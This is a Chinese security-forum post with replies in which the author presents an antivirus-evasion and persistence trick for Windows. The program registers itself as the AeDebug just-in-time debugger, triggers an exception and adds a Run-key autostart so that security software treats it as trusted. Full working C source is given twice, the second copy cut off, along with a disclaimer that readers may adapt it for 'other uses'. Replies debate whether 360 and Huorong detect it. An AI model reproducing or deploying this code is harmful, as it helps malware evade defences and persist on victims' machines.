[原创]我洗个澡就绕过了杀软的防护-逆向工程-看雪安全社区

[原创]我洗个澡就绕过了杀软的防护

发表于: 2021-4-25 20:36 21698

[原创]我洗个澡就绕过了杀软的防护

零加一

2021-4-25 20:36

21698

2021年4月23日晴。
结束了这一天的工作，回到酒店准备洗完澡朋友朋友搓两把war3。
洗澡的过程中，蹦出了一个想法:如何优雅简洁地把自身进程变为杀软可信的进程呢？
一直想到洗完澡，突然想到:父进程如果是系统进程比如services.exe csrss.exe之类的不就好了。灵光一闪:即时调试器！如果设置了即时调试器，当程序发生异常后不就会自行启动了！！！
当即我就鸽了朋友开始新建项目。
写好的恶意程序设置为即时调试器时，然后添加自启动。
果然杀软没拦截，而且最顶级的父进程居然是wininit.exe

将恶意进程设为即时调试器，随后触发异常，恶意程序运行。

360安全卫士

火绒

源码仅供学习，不要用做其他用途。
其他用途请自行删删改改。

时间:2021年04月26日10:51
360

火绒

#include<Windows.h>
#include<Winerror.h>
#include"tlhelp32.h"
#include<stdio.h>
#pragma warning(disable:4996)
int pass360 = true;
int SetAeDebug()
{
    HKEY key = { 0 };
    DWORD res = 0;
    char CurrentPath[MAX_PATH] = { 0 };
    char Shell[MAX_PATH] = { 0 };
    char* Debuger = NULL;
    GetModuleFileNameA(0, CurrentPath, MAX_PATH);
    //%ld 是为了接收触发异常的进程pid。最终命令为 CurrentPath -cmd xxx
    Debuger = CurrentPath;
    //360联网的话需要这样做
    if (pass360)
    {
        sprintf(Shell, "reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v wowfk /d \"%s\" /f", CurrentPath);
        Debuger = Shell;
    }
    else
    {
        strncat(CurrentPath, " -cmd %ld", 10);
    }
    res = RegCreateKeyA(HKEY_LOCAL_MACHINE, "SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\", &key);
    if (!res)
    {
        res = RegSetValueExA(key, "Auto", 0, REG_SZ, (CONST BYTE*)"1", 1);
        if (!res)
        {
            res = strnlen(Debuger, MAX_PATH);
            res = RegSetValueExA(key, "Debugger", 0, REG_SZ, (CONST BYTE*)Debuger, res);
            res = res == 0;
        }
        RegCloseKey(key);
    }
    return res;
}
int SetAutoRun()
{
    HKEY key = { 0 };
    DWORD res = 0;
    char CurrentPath[MAX_PATH] = { 0 };
    GetModuleFileNameA(0, CurrentPath, MAX_PATH);
    res = RegCreateKeyA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &key);
    if (!res)
    {
        strncat(CurrentPath, " -AutoRun", 9);
        res = strnlen(CurrentPath, MAX_PATH);
        res = RegSetValueExA(key, "wowfk", 0, REG_SZ, (CONST BYTE*)CurrentPath, res);
        res = res == 0;
        RegCloseKey(key);
    }
    return res;
}
int KillExceptProcess(char* strPid)
{
    int pid = 0;
    pid = atoi(strPid);
    int res = 0;
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, pid);
    if (hProcess)
    {
        res=TerminateProcess(hProcess, 0);
        CloseHandle(hProcess);
    }
    return res;
}
int main(int argc,char* argv[])
{
    if (argc==1 && SetAeDebug()==1)
    {
        MessageBoxA(0, "See", "Done", 0);
        _asm int 3
    }
    else if(argc==3 && !pass360)
    {
        //防止二次执行
        if (KillExceptProcess(argv[2]))
        {
            if (SetAutoRun() == 1)
            {
                MessageBoxA(0, "AddAutoRunDone", "AutoRun", 0);
            }
        }
    }
}

#include<Windows.h>

#include<Winerror.h>

#include"tlhelp32.h"

#include<stdio.h>

#pragma warning(disable:4996)

int pass360 = true;

int SetAeDebug()

{

HKEY key = { 0 };

DWORD res = 0;

char CurrentPath[MAX_PATH] = { 0 };

char Shell[MAX_PATH] = { 0 };

char* Debuger = NULL;

GetModuleFileNameA(0, CurrentPath, MAX_PATH);

//%ld 是为了接收触发异常的进程pid。最终命令为 CurrentPath -cmd xxx

Debuger = CurrentPath;

//360联网的话需要这样做

if (pass360)

{

sprintf(Shell, "reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v wowfk /d \"%s\" /f", CurrentPath);

Debuger = Shell;

}

else

{

strncat(CurrentPath, " -cmd %ld", 10);

}

res = RegCreateKeyA(HKEY_LOCAL_MACHINE, "SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\", &key);

if (!res)

{

res = RegSetValueExA(key, "Auto", 0, REG_SZ, (CONST BYTE*)"1", 1);

if (!res)

{

res = strnlen(Debuger, MAX_PATH);

res = RegSetValueExA(key, "Debugger", 0, REG_SZ, (CONST BYTE*)Debuger, res);

res = res == 0;

}

RegCloseKey(key);

}

return res;

}

int SetAutoRun()

{

登录后可查看完整内容

传播安全知识、拓宽行业人脉——看雪讲师团队等你加入！

最后于 2021-4-26 10:51 被零加一编辑，原因：

#病毒木马

收藏・61

免费・19

支持

赞赏记录

参与人

雪币

留言

时间

東陽不列山

看雪因你而更加精彩！

2024-6-14 05:07

4essence

为你点赞~

2024-2-18 21:06

逃跑的小熊

为你点赞~

2024-1-25 13:24

令狐双

为你点赞~

2024-1-17 17:04

ydshk

为你点赞~

2022-8-27 17:46

mb_ljxnosvl

为你点赞~

2022-8-8 14:50

wtyjqpaszl

为你点赞~

2022-5-8 16:45

wx_墨雪妖莲

为你点赞~

2021-9-1 17:46

Umiade

为你点赞~

2021-8-24 11:31

DickBoomSky

为你点赞~

2021-5-12 17:01

系统管理员

为你点赞~

2021-4-26 17:34

r0Cat

为你点赞~

2021-4-26 11:31

浅笑心柔

为你点赞~

2021-4-26 11:27

沉疴

为你点赞~

2021-4-26 10:26

mb_goeixzjd

为你点赞~

2021-4-26 09:53

Lixinist

为你点赞~

2021-4-26 09:32

梦游枪手

为你点赞~

2021-4-25 20:41

FiveEyes

为你点赞~

2021-4-25 20:39

wmsuper

为你点赞~

2021-4-25 20:38

最新回复 (39) 1 2 ▶
wmsuper 雪币： 9698 活跃值： (15735) 能力值： ( LV13，RANK：400 ) 在线值：发帖 36 回帖 137 粉丝 356 关注私信	wmsuper 7 2 楼太强了 2021-4-25 20:38 0
FiveEyes 雪币： 1002 活跃值： (757) 能力值： ( LV9，RANK：181 ) 在线值：发帖 2 回帖 11 粉丝 2 关注私信	FiveEyes 3 楼太强了 2021-4-25 20:39 0
梦游枪手雪币： 2155 活跃值： (2592) 能力值： ( LV12，RANK：667 ) 在线值：发帖 30 回帖 53 粉丝 17 关注私信	梦游枪手 4 楼太强了 2021-4-25 20:41 0
10ngvv 雪币： 1278 活跃值： (1265) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 47 粉丝 13 关注私信	10ngvv 5 楼提供了一个思路。。 2021-4-25 21:04 0
pureGavin 雪币： 17118 活跃值： (20559) 能力值： ( LV12，RANK：300 ) 在线值：发帖 100 回帖 1464 粉丝 320 关注私信	pureGavin 3 6 楼感谢分享，建议996的公司再自己公司内修建澡堂 2021-4-25 21:23 2
零加一雪币： 2047 活跃值： (4950) 能力值： ( LV13，RANK：278 ) 在线值：发帖 12 回帖 41 粉丝 173 关注私信	零加一 3 7 楼 pureGavin 感谢分享，建议996的公司再自己公司内修建澡堂您也是有资本家的潜质！！！杀手已经派了 2021-4-25 22:25 1
默NJ 雪币： 3414 活跃值： (6108) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 212 粉丝 2 关注私信	默NJ 8 楼好思路,学到了 2021-4-25 22:29 0
hhkqqs 雪币： 15015 活跃值： (8344) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 174 粉丝 44 关注私信	hhkqqs 1 9 楼 666 2021-4-26 00:07 0
taizhong 雪币： 123 活跃值： (406) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 159 粉丝 4 关注私信	taizhong 10 楼妙啊 2021-4-26 00:18 0
a1pha 雪币： 2 能力值： ( LV1，RANK：0 ) 在线值：发帖 1 回帖 3 粉丝 0 关注私信	a1pha 11 楼什么牌子的沐浴露和洗发膏，我觉得教程帖里不能少了这样的东西。 2021-4-26 05:57 2
suuuuu 雪币： 864 活跃值： (5144) 能力值： ( LV2，RANK：10 ) 在线值：发帖 22 回帖 298 粉丝 8 关注私信	suuuuu 12 楼电竞酒店吗 2021-4-26 09:01 0
xxRea 雪币： 118 活跃值： (2045) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 157 粉丝 1 关注私信	xxRea 13 楼大佬牛逼 2021-4-26 09:06 0
Lixinist 雪币： 9934 活跃值： (2554) 能力值： ( LV6，RANK：87 ) 在线值：发帖 13 回帖 350 粉丝 20 关注私信	Lixinist 1 14 楼即时调试器。。。不会跟源哥有关吧 2021-4-26 09:25 0
mi1itray.axe 雪币： 1836 活跃值： (1241) 能力值： ( LV5，RANK：75 ) 在线值：发帖 4 回帖 9 粉丝 27 关注私信	mi1itray.axe 1 15 楼太强了 2021-4-26 09:32 0
木志本柯雪币： 5934 活跃值： (7193) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 406 粉丝 6 关注私信	木志本柯 16 楼哦太骚了这脑回路 2021-4-26 09:42 0
htpidk 雪币： 8675 活跃值： (5811) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 304 粉丝 1 关注私信	htpidk 17 楼学到了一招 2021-4-26 09:47 0
tDasm 雪币： 17398 活跃值： (8688) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 709 粉丝 23 关注私信	tDasm 18 楼程序是运行了，是因为程序没有恶意行为？杀软不可能凭文件名来判断是否是恶意程序，而是根据运行过程的行为来拦截。首先你在程序中修改注册表变成即时调试器的代码就会被杀软拦截并提示；其次，如果在程序中修改或删除文件，杀软同样会拦截并提示的. 最后于 2021-4-26 10:11 被tDasm编辑，原因： 2021-4-26 10:00 0
guotouck 雪币： 35 活跃值： (1109) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 155 粉丝 1 关注私信	guotouck 19 楼修改注册表都提示了. 上传的附件： 22222.png （15.84kb，5次下载） 2021-4-26 10:07 0
零加一雪币： 2047 活跃值： (4950) 能力值： ( LV13，RANK：278 ) 在线值：发帖 12 回帖 41 粉丝 173 关注私信	零加一 3 20 楼 guotouck 修改注册表都提示了. 可能我的火绒比较拉 2021-4-26 10:17 0
沉疴雪币： 364 活跃值： (550) 能力值： ( LV4，RANK：50 ) 在线值：发帖 8 回帖 23 粉丝 1 关注私信	沉疴 1 21 楼零加一 [em_85]您也是有资本家的潜质！！！杀手已经派了狙击手已就位，等钱到账 2021-4-26 10:24 0
boursonjane 雪币： 2612 活跃值： (3529) 能力值： ( LV3，RANK：20 ) 在线值：发帖 6 回帖 190 粉丝 13 关注私信	boursonjane 22 楼记得去年可以用反向创建注册表符号链接绕过360注册表防护创建自启动 2021-4-26 10:24 0
零加一雪币： 2047 活跃值： (4950) 能力值： ( LV13，RANK：278 ) 在线值：发帖 12 回帖 41 粉丝 173 关注私信	零加一 3 23 楼 tDasm 程序是运行了，是因为程序没有恶意行为？杀软不可能凭文件名来判断是否是恶意程序，而是根据运行过程的行为来拦截。首先你在程序中修改注册表变成即时调试器的代码就会被杀软拦截并提示；其次，如果在程序中修改或删 ... 刚刚测试360确实提示了，但是换一换就又不提示了，自行发掘。 2021-4-26 10:30 0
沉疴雪币： 364 活跃值： (550) 能力值： ( LV4，RANK：50 ) 在线值：发帖 8 回帖 23 粉丝 1 关注私信	沉疴 1 24 楼散会了，打开“注册表防护”可拦 2021-4-26 10:49 0
零加一雪币： 2047 活跃值： (4950) 能力值： ( LV13，RANK：278 ) 在线值：发帖 12 回帖 41 粉丝 173 关注私信	零加一 3 25 楼沉疴散会了，打开“注册表防护”可拦就有啥吃啥呗 2021-4-26 10:54 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

零加一

发帖

回帖

278

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (39) 1 2 ▶
wmsuper 雪币： 9698 活跃值： (15735) 能力值： ( LV13，RANK：400 ) 在线值：发帖 36 回帖 137 粉丝 356 关注私信	wmsuper 7 2 楼太强了 2021-4-25 20:38 0
FiveEyes 雪币： 1002 活跃值： (757) 能力值： ( LV9，RANK：181 ) 在线值：发帖 2 回帖 11 粉丝 2 关注私信	FiveEyes 3 楼太强了 2021-4-25 20:39 0
梦游枪手雪币： 2155 活跃值： (2592) 能力值： ( LV12，RANK：667 ) 在线值：发帖 30 回帖 53 粉丝 17 关注私信	梦游枪手 4 楼太强了 2021-4-25 20:41 0
10ngvv 雪币： 1278 活跃值： (1265) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 47 粉丝 13 关注私信	10ngvv 5 楼提供了一个思路。。 2021-4-25 21:04 0
pureGavin 雪币： 17118 活跃值： (20559) 能力值： ( LV12，RANK：300 ) 在线值：发帖 100 回帖 1464 粉丝 320 关注私信	pureGavin 3 6 楼感谢分享，建议996的公司再自己公司内修建澡堂 2021-4-25 21:23 2
零加一雪币： 2047 活跃值： (4950) 能力值： ( LV13，RANK：278 ) 在线值：发帖 12 回帖 41 粉丝 173 关注私信	零加一 3 7 楼 pureGavin 感谢分享，建议996的公司再自己公司内修建澡堂您也是有资本家的潜质！！！杀手已经派了 2021-4-25 22:25 1
默NJ 雪币： 3414 活跃值： (6108) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 212 粉丝 2 关注私信	默NJ 8 楼好思路,学到了 2021-4-25 22:29 0
hhkqqs 雪币： 15015 活跃值： (8344) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 174 粉丝 44 关注私信	hhkqqs 1 9 楼 666 2021-4-26 00:07 0
taizhong 雪币： 123 活跃值： (406) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 159 粉丝 4 关注私信	taizhong 10 楼妙啊 2021-4-26 00:18 0
a1pha 雪币： 2 能力值： ( LV1，RANK：0 ) 在线值：发帖 1 回帖 3 粉丝 0 关注私信	a1pha 11 楼什么牌子的沐浴露和洗发膏，我觉得教程帖里不能少了这样的东西。 2021-4-26 05:57 2
suuuuu 雪币： 864 活跃值： (5144) 能力值： ( LV2，RANK：10 ) 在线值：发帖 22 回帖 298 粉丝 8 关注私信	suuuuu 12 楼电竞酒店吗 2021-4-26 09:01 0
xxRea 雪币： 118 活跃值： (2045) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 157 粉丝 1 关注私信	xxRea 13 楼大佬牛逼 2021-4-26 09:06 0
Lixinist 雪币： 9934 活跃值： (2554) 能力值： ( LV6，RANK：87 ) 在线值：发帖 13 回帖 350 粉丝 20 关注私信	Lixinist 1 14 楼即时调试器。。。不会跟源哥有关吧 2021-4-26 09:25 0
mi1itray.axe 雪币： 1836 活跃值： (1241) 能力值： ( LV5，RANK：75 ) 在线值：发帖 4 回帖 9 粉丝 27 关注私信	mi1itray.axe 1 15 楼太强了 2021-4-26 09:32 0
木志本柯雪币： 5934 活跃值： (7193) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 406 粉丝 6 关注私信	木志本柯 16 楼哦太骚了这脑回路 2021-4-26 09:42 0
htpidk 雪币： 8675 活跃值： (5811) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 304 粉丝 1 关注私信	htpidk 17 楼学到了一招 2021-4-26 09:47 0
tDasm 雪币： 17398 活跃值： (8688) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 709 粉丝 23 关注私信	tDasm 18 楼程序是运行了，是因为程序没有恶意行为？杀软不可能凭文件名来判断是否是恶意程序，而是根据运行过程的行为来拦截。首先你在程序中修改注册表变成即时调试器的代码就会被杀软拦截并提示；其次，如果在程序中修改或删除文件，杀软同样会拦截并提示的. 最后于 2021-4-26 10:11 被tDasm编辑，原因： 2021-4-26 10:00 0
guotouck 雪币： 35 活跃值： (1109) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 155 粉丝 1 关注私信	guotouck 19 楼修改注册表都提示了. 上传的附件： 22222.png （15.84kb，5次下载） 2021-4-26 10:07 0
零加一雪币： 2047 活跃值： (4950) 能力值： ( LV13，RANK：278 ) 在线值：发帖 12 回帖 41 粉丝 173 关注私信	零加一 3 20 楼 guotouck 修改注册表都提示了. 可能我的火绒比较拉 2021-4-26 10:17 0
沉疴雪币： 364 活跃值： (550) 能力值： ( LV4，RANK：50 ) 在线值：发帖 8 回帖 23 粉丝 1 关注私信	沉疴 1 21 楼零加一 [em_85]您也是有资本家的潜质！！！杀手已经派了狙击手已就位，等钱到账 2021-4-26 10:24 0
boursonjane 雪币： 2612 活跃值： (3529) 能力值： ( LV3，RANK：20 ) 在线值：发帖 6 回帖 190 粉丝 13 关注私信	boursonjane 22 楼记得去年可以用反向创建注册表符号链接绕过360注册表防护创建自启动 2021-4-26 10:24 0
零加一雪币： 2047 活跃值： (4950) 能力值： ( LV13，RANK：278 ) 在线值：发帖 12 回帖 41 粉丝 173 关注私信	零加一 3 23 楼 tDasm 程序是运行了，是因为程序没有恶意行为？杀软不可能凭文件名来判断是否是恶意程序，而是根据运行过程的行为来拦截。首先你在程序中修改注册表变成即时调试器的代码就会被杀软拦截并提示；其次，如果在程序中修改或删 ... 刚刚测试360确实提示了，但是换一换就又不提示了，自行发掘。 2021-4-26 10:30 0
沉疴雪币： 364 活跃值： (550) 能力值： ( LV4，RANK：50 ) 在线值：发帖 8 回帖 23 粉丝 1 关注私信	沉疴 1 24 楼散会了，打开“注册表防护”可拦 2021-4-26 10:49 0
零加一雪币： 2047 活跃值： (4950) 能力值： ( LV13，RANK：278 ) 在线值：发帖 12 回帖 41 粉丝 173 关注私信	零加一 3 25 楼沉疴散会了，打开“注册表防护”可拦就有啥吃啥呗 2021-4-26 10:54 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复